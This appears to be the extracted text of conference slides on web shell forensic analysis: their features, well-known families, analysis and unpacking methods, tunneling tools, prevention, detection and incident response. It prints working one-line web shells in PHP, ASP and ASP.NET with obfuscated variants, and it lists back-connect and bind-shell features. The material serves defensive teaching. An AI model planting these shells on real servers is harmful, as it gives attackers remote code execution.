advanced-web-shell-forensic-analysis-pt-1-2.pdf

(1)

1

Advanced Web Shell Forensic Analysis

Vincent Lo

Insert Confidentiality notice here

■PART ONE ■

Reminder

Advanced Web Shell Forensic Analysis

Level:

Advanced

Prerequisite:

(2)

3

Disclaimer

Advanced Web Shell Forensic Analysis

Opinions are my own and not the views of my employer.

4

Who is this guy?

Vincent Lo

Senior Incident Responder

CISSP, CCE, GCFA Gold, GCIH, GNFA, GREM

Twitter_● @_VincentLo_

(3)

5

■

PART ONE

●

BASIC

■

1:00 pm – 2:00 pm

■

PART TWO

●

ADVANCED

■

2:30 pm – 3:30 pm

What are we talking about today?

Agenda

■

PART ONE

●

BASIC

■

• Introduction

What are they?

Well-known well shells

Agenda

• Web Shell Analysis Techniques

Dynamic behavior analysis

(4)

7

■

PART TWO ●

ADVANCED

■

• Advanced source code analysis • Advanced Features

Hidden Shells Tunneling Mass Mailer DDoS

System targeted shell

Agenda

• Web Shell Prevention • Web Shell Detection • Incident Response

8

•

Dynamic web pages

•

Written in server-side script languages, such as PHP, JSP, ASP, and

ASP.NET

•

Discovered many years ago

•

Still evolving….

What are they?

(5)

9 9

Master Title

Web Shells

What can they do?

File Manager

• Copy

• Edit

• Delete

• Move

• Execute

• Upload

What can they do?

(6)

11

Server Information

• Operating system information

• Loaded Apache modules

• Disabled PHP functions

• Useful commands

• Downloader commands

• /etc/passwd

What can they do?

Web Shells

12

Server Information

• CPU Info

• Memory Info

• Partition Info

• PHP Environment

What can they do?

(7)

13

System Thread Information

• List

• Kill

What can they do?

Web Shells

Console

• Run your own commands

What can they do?

(8)

15

Console

• List dir

• Find

• Locate

What can they do?

Web Shells

16

PHP

• Execute your own codes

What can they do?

(9)

17

String Tools

• String conversion

• Encode/Decode

• MD5 cracking websites

What can they do?

Web Shells

Bruteforce

• FTP

• MySql

• PostgreSql

What can they do?

(10)

19

SQL

• MySql

• PostgreSql

What can they do?

Web Shells

20

Network

• Bind port to /bin/sh

• Back-connect

What can they do?

(11)

21

Self Remove

What can they do?

Web Shells

AND MORE…...(

will be introduced in

PART TWO.)

What can they do?

(12)

23

•

WSO (FilesMan)

•

b374n

•

c99

•

China Chopper (client program)

•

Weevely

•

And more…

Well known web shells

Web Shells

24

Well, what if they are found on your web servers?

Why do we care?

(13)

25

Source: http://krebsonsecurity.com/2016/02/breached-credit-union-comes-out-of-its-shell/

Real Incident

Web Shells

Source: http://krebsonsecurity.com/2016/02/breached-credit-union-comes-out-of-its-shell/

Real Incident

(14)

27

How did they get into our web servers?

Web Shells

28

• Cross-Site Scripting; • SQL Injection;

• Vulnerabilities in applications/services (e.g., WordPress or other CMS applications); • File processing vulnerabilities (e.g., upload filtering or assigned permissions);

• Remote File Include (RFI) and Local File Include (LFI) vulnerabilities;

• Exposed Admin Interfaces (possible areas to find vulnerabilities mentioned above).

How did they get into our web servers?

Web Shells

(15)

29 29

Master Title

Web Shell Analysis

“If you know the enemy and yourself, you need not fear battles.”

“If you know the enemy and yourself, you need not fear battles.

If you know yourself but not the enemy, for every victory gained you will also suffer a defeat.

If you know neither the enemy nor yourself, you will succumb in every battle.”

- The Art of War by Sun Tzu

Why do we need to analyze them?

(16)

31 • Dynamic behavior analysis

• Static source code analysis

What to look for?

What to do if it is packed?

What if….?

• Advanced source code analysis

How to analyze them?

Web Shell Analysis

32 • Analysis Environment

Sandbox

Private Network

• Operating System

Linux

Windows

Dynamic behavior analysis | Environment

Web Shell Analysis

• Web Server

Apache

IIS

Java Web Server

• Web Server Configuration

(17)

33 • Consulting work

Pre-build the environment/template to reduce the response time.

Try to mimic client’s web server environment as much as possible.

Dynamic behavior analysis | Environment

Web Shell Analysis

• Ideal Environment

Dynamic behavior analysis | Environment

(18)

35

Demonstration

• WSO 2.0

Dynamic behavior analysis

Web Shell Analysis

36

• Pros

Easy to understand how web shells work.

Identify their features and artefacts in a short time. Can test functions and see if they really work.

• Cons

May miss hidden functions.

May not work if web shells require passwords.

May need time to build/configure the environment.

Dynamic behavior analysis

(19)

37

• First time?

• Need to understand the server-side script languages. Google can be your best friend.

• Review codes and get familiar with attack techniques.

• Don’t get discouraged and don’t give up easily. Some web shells are designed to be hard to read.

Some web shells even contain fake functions/codes.

• Don’t worry. The review speed will become faster and faster once you are more familiar with the codes.

Static source code analysis

Web Shell Analysis

• Exercise (WSO 2.0)

• Try to identify interesting functions.

Static source code analysis | PHP | What to look for?

(20)

39 • Exercise (WSO 2.0)

• Password

Password is provided if you are lucky. ☺

MD5 algorithm?

Web Shell Analysis

• Password

MD5 algorithm!

(21)

• Avoid search engines

HTTP 404 – Not Found

Exit

Web Shell Analysis

• Commands behind the scene

Static source code analysis | PHP | What to look for?

(22)

•

KOI8-R & KOI8-U

Web Shell Analysis

44 • Variable names

• Passwords

• Interesting functions

Web Shell Analysis

(23)

45 • Comments ☺

Static source code analysis | PHP | What to look for?

Web Shell Analysis

• Find the password

• Check the source code

• Google

• Crack it

• Bypass/Kill the password

Static source code analysis | PHP | Password protected

(24)

47 • Login password

Validation algorithm MD5/SHA1

Customised algorithm

• HTTP 404 code • HTTP 404 page • Variable Names

Static source code analysis | PHP | Obfuscation Techniques

Web Shell Analysis

48

Static source code analysis | PHP | What if it is packed?

(25)

49

Web Shell Analysis

• Decoding environment

Web server

Web components

Browser

• Decoding tools

Online

Manual

May need to develop decoding tools to assist

• Encoding algorithm

Base64

ROT13

Character encoding

Customised encoding algorithms

Multiple encoding with different algorithms

Static source code analysis | PHP | What if it is packed?

Web Shell Analysis

How to unpack the shell?

(26)

51

Web Shell Analysis

• Exercise (b374k)

How to unpack the shell?

String operators

eval => echo

52

Intermittent

Web Shells

var q = "u"; var w = "afe"; var a = q + "ns" + w; var b= /*///*/eval(str,a); return(b);

}

function dec(str,key) { var k,q,t; var s=""; var p="";

for(k = 0; k < str.length; k=k+2) {

t = ((k+2)/2) % key.length; p = key.substr(t, 1); if (isFinite(str.substr(k, 1))) {

q = "0x"+ str.substr(k, 2); s = s + char(int(q)-p);// + "|" + p +"|"; }

else {

(27)

53

Advanced Web Shell Forensic Analysis

Vincent Lo

Insert Confidentiality notice here

■PART TWO ■

■

PART ONE

●

BASIC

■

1:00 pm – 2:00 pm

■

PART TWO

●

ADVANCED

■

2:30 pm – 3:30 pm

(28)

55

■

PART TWO ●

ADVANCED

■

• Advanced source code analysis • Advanced Features

Hidden Shells

Tunneling

Mass Mailer

DDoS

System targeted shell

Agenda

• Web Shell Prevention • Web Shell Detection • Incident Response

56 56

Master Title

Advanced Source Code Analysis

(29)

57

Demonstration

ASP | Self Changing Codes

What if…?

(30)

59

What if…? | One Sentence Trojan

• One Sentence Trojan (一句話木馬)

• PHP:

<?php eval($_POST[cmd]);?>

• ASP:

<%execute(request(”cmd"))%>

• ASP.NET:

<%@ Page Language="Jscript"%>

<%eval(Request.Item[”cmd"],”unsafe”)%>

Source: http://baike.baidu.com/view/102246.htm

60

(31)

61

Client Programs

•

China Chopper (

中国菜刀

)

•

Lanker (lanker

一句话客户端

)

•

ZV (ZV

新型

PHP

一句话木马客户端

GUI

版

)

•

一句话客户端增强版

Source: http://baike.baidu.com/view/102246.htm

What if…? | One Sentence Trojan

In the real world, one sentence trojan’s codes are not always the same. They can be modified or encoded to avoid the detection.

• <%eval request("value")%>

• <%execute request("value")%>

• <%execute(request("value"))%>

• <%If Request("value")<>"" Then Execute(Request("value"))%>

(32)

63

Advanced Source Code Analysis

How do we analyze it? • Web server logs

• IDS/IPS alerts

• Proxy logs

• PCAP

64 64

Master Title

(33)

65

Hidden | JPEG

Advanced Features

JPEG EXIF

Hide malicious codes in EXIF fields or embed them in files.

Steganography

http://www.slideshare.net/saumilshah/stegosploit-hacking-with-pictures

Source: http://www.arkteam.net/?p=48

Master Title

(34)

67

Tunneling

Advanced Features

68

SOCKS Proxy | reGeorg

Advanced Features

“The successor to reDuh, pwn a bastion webserver and create SOCKS proxies

through the DMZ. Pivot and pwn. ”

• Client is written in Python

• Support multiple server-side languages • PHP

• ASPX

• ASHX

• JSP

(35)

69

Tunna

Advanced Features

“Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments. ”

• Client is written in Python

• Support multiple server-side languages • PHP

• ASPX

• JSP

Source: _{https://github.com/SECFORCE/Tunna}

Master Title

(36)

71

Mass Mailer

Advanced Features

72 72

Master Title

Advanced Features

(37)

73

Why web servers?

•

24 x 7

•

Accessibility

•

More powerful than PCs usually

•

Bandwidth

DDoS

Advanced Features

Shell Booter

•

Execute Booter

•

Panic Stresser

•

Vengeance Booter

•

Anonymous Booter

•

And more…

Advanced Features

(38)

75

Advanced Features

DDoS | Shell Booter

76 76

Master Title

Advanced Features

(39)

77

Advanced Features

System targeted web shells | WHMCS Killer

WHMCS

Advanced Features

System targeted web shells | WHMCS Killer

(40)

79

Advanced Features

System targeted web shells | cPanel Cracker

cPanel

80

Advanced Features

System targeted web shells | cPanel Cracker

(41)

81 81

Master Title

Web Shell Prevention

“Prevention is more important than detection and recovery.”

Web Shell Prevention | Attacks, Vulnerabilities, & Patches

• Web Application Firewall

• Penetration Testing

Update codes

• Updates & Patches

Operating System Web servers

(42)

83

Web Shell Prevention | Securing CMS

Source: https://www.us-cert.gov/ncas/alerts/TA15-314A

84

Web Shell Prevention | Securing CMS

(43)

85

Web Shell Prevention | Securing CMS

Hardening Wordpress

http://codex.wordpress.org/Hardening_WordPress

Joomla – Security Checklist

https://docs.joomla.org/Security_Checklist

Web Shell Prevention | Upload Function

• Check uploaded files

Whitelist file extensions

Check file extension properly

.php.jpg, .jpg.asp, .php;.jpg and so on.

Don’t rely on file types

Be careful about .cer if using IIS

• Randomize uploaded filenames

• Disable “execute” permission

• Don’t call itself “upload”

upload.aspx, upload.php and so on.

• Don’t show the actual path

• Error message

• URL

• Re-encode/re-generate images

• Disable components/functions that are not required.

(44)

87 87

Master Title

Web Shell Detection

Are they on our servers?

88

• PHP Shell Detector

• NeoPI

• Web Vulnerability Scanners

• Antivirus programs

• IDS/IPS

Web Shell Detection | How do we detect them?

Web Shell Detection

• File Integrity System

(45)

89 89

Master Title

Incident Response

Find evil

• Web server logs

•

Check integrity of logs

•

Fields

• Proxy logs

• Web site files

• Relevant servers’ logs & artifacts

Find evil | Evidence

Incident Response

• IDS/IPS logs

(46)

91

• Yara

• Grep

Find evil | How do we find them?

Incident Response

92

Find evil | Experience

(47)

93

Find evil | Experience

Incident Response

Master Title

Recap

(48)

95

• Well-known web shells

• Dynamic analysis

• Static analysis

• Web shell prevention and detection

• Incident response

• The analysis concept we learn today works for analyzing malicious

PowerShell scripts too.

What do we learn today?

Recap

96 Vincent Lo | Senior Incident Responder

TWITTER ■@_VincentLo_ EMAIL ■[email protected]

advanced-web-shell-forensic-analysis-pt-1-2.pdf

Advanced Web Shell Forensic Analysis

■PART ONE ■

Reminder

Level:

Advanced

Prerequisite:

Disclaimer

BASIC

ADVANCED

ASP.NET

File Manager

What can they do?

Server Information

What can they do?

Server Information

What can they do?

System Thread Information

What can they do?

Console

What can they do?

Console

What can they do?

String Tools

What can they do?

Bruteforce

What can they do?

Network

What can they do?

Self Remove

What can they do?

Why do we care?

Web Shells

“If you know the enemy and yourself, you need not fear battles.”

- The Art of War by Sun Tzu

Linux

Dynamic behavior analysis | Environment

Dynamic behavior analysis

Static source code analysis

Web Shell Analysis

Static source code analysis | PHP | What to look for?

Static source code analysis | PHP | What to look for?

Static source code analysis | PHP | Obfuscation Techniques

Static source code analysis | PHP | What if it is packed?

Advanced Web Shell Forensic Analysis

■PART TWO ■

PART ONE

Master Title

• One Sentence Trojan (一句話木馬)

<?php eval($_POST[cmd]);?>

Client Programs

China Chopper (

What if…? | One Sentence Trojan

Advanced Source Code Analysis

Steganography

Master Title

Tunna

Master Title

And more…

cPanel

Web Shell Prevention | Securing CMS

Joomla – Security Checklist

Master Title

Incident Response

Incident Response

PowerShell scripts too.

LYLC-SPEARANDSHIELD.TUMBLR.COM

THANK YOU